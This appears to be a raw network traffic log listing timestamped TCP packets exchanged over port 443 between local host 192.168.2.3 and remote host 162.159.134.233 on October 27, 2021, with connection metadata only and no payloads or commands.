Oct 27, 2021 03:03:26.292711973 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.332694054 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.332870960 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.332935095 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.332957029 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.333020926 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.333074093 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.333085060 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.333157063 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.333201885 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.333211899 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.333266020 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.333304882 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.333314896 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.333398104 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.333456993 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.333465099 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.333520889 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.333565950 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.333571911 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.333901882 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.333971977 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.334037066 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.334043026 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.334054947 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.334083080 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.334737062 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.334810972 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.334824085 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.334844112 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.334973097 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.335002899 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.335016966 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.335131884 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.335141897 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.335711002 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.335772991 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.335781097 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.335798025 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.335839987 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.335871935 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.348830938 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.348934889 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.348954916 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.348982096 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.349030972 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.349072933 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.349186897 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.349240065 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.349251032 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.349325895 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.349379063 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.349387884 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.349447012 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.349510908 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.349539995 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.349548101 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.349590063 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.349936008 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.350052118 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.350097895 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.350110054 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.350778103 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.350843906 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.350857973 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.351696968 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.351752996 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.351762056 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.351779938 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.351820946 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.352468014 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.352565050 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.352606058 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.352622032 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.352632999 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.353435040 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.353519917 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.353557110 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.353570938 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.353581905 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.354531050 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.354600906 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.354615927 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.354662895 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.355145931 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.355215073 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.356035948 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.356111050 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.364926100 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.365030050 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.365051985 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.365112066 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.365917921 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.366003036 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.366301060 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.366365910 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.366394043 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.366449118 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.367305040 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.367372036 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.367772102 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.367851019 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.368587971 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.368674994 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.368680954 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.368700027 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.368753910 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.369442940 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.369528055 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.369755030 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.369837046 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.370291948 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.370354891 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.371016979 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.371093988 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.371666908 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.371733904 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.371754885 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.371820927 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.372545004 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.372612953 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.372627974 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.372704983 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.373368979 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.373475075 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.374176025 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.374255896 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.374263048 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.374283075 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.374337912 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.374926090 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.375000000 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.375534058 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.375621080 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.375624895 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.375644922 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.375699043 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.376543045 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.376614094 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.376616955 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.376636028 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.376686096 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.377429962 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.377496004 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.377506018 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.377528906 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.377579927 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.377590895 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.377626896 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.378487110 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.378568888 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.378581047 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.378604889 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.378696918 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.378710032 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.379292965 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.379398108 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.379411936 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.379502058 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.380565882 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.380636930 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.380657911 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.380670071 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.380703926 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.382297993 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.382378101 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.382435083 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.382512093 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.382531881 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.383613110 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.383683920 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.383702040 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.383763075 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.383796930 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.385374069 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.385448933 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.385580063 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.385605097 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.386569023 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.386636972 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.386707067 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.386725903 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.386818886 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.388236046 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.388308048 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.388374090 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.388391972 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.388461113 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.389234066 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.389302969 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.389372110 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.389388084 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.389553070 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.390947104 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.391012907 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.391135931 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.391149044 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.391321898 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.391884089 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.391957045 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.392010927 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.392018080 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.392129898 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.393641949 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.393709898 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.393754005 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.393762112 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.393887043 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.394215107 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.394313097 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.394329071 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.394417048 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.395992994 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.396048069 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.396083117 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.396090984 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.396194935 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.396241903 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.396781921 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.396833897 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.396882057 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.396893024 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.396961927 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.397661924 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.397677898 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.397720098 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.397766113 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.397773027 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.397839069 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.398132086 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.398950100 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.398987055 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.399048090 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.399051905 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.399066925 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.399135113 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.399986982 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.400043964 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.400079966 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.400089025 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.400151014 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.400881052 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.400926113 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.400953054 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.400960922 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.401045084 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.401473045 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.401521921 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.401566029 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.401573896 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.401652098 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.401667118 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.401715994 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.401751995 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.401757956 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.401788950 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.401818991 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.402607918 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.402657986 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.402728081 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.402734995 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.402791977 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.403462887 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.403517962 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.403599024 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.403614044 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.403650999 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.403697014 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.404083014 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.404134989 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.404194117 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.404201031 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.404264927 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.404350042 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.404400110 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.404476881 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.404484987 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.404541016 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.404632092 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.405117989 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.405169964 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.405220985 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.405239105 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.405339956 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.405853987 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.405895948 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.405940056 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.405958891 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.406030893 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.406110048 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.406148911 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.406157970 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.406172037 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.406232119 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.406284094 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.406940937 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.406982899 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.407033920 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.407049894 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.407088041 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.407126904 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.407699108 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.407741070 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.407793999 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.407810926 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.407851934 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.407874107 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.408225060 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.408267975 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.408323050 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.408340931 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.408365965 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.408411980 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.408433914 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.408442974 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.408514977 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.408524990 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.408564091 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.408571959 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.408598900 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.408636093 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.409271955 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.409313917 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.409356117 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.409373999 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.409440041 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.409459114 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.409957886 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.410001993 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.410057068 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.410078049 CEST	443	49718	162.159.134.233	192.168.2.3
Oct 27, 2021 03:03:26.410096884 CEST	49718	443	192.168.2.3	162.159.134.233
Oct 27, 2021 03:03:26.410151958 CEST	443	49718	162.159.134.233	192.168.2.3
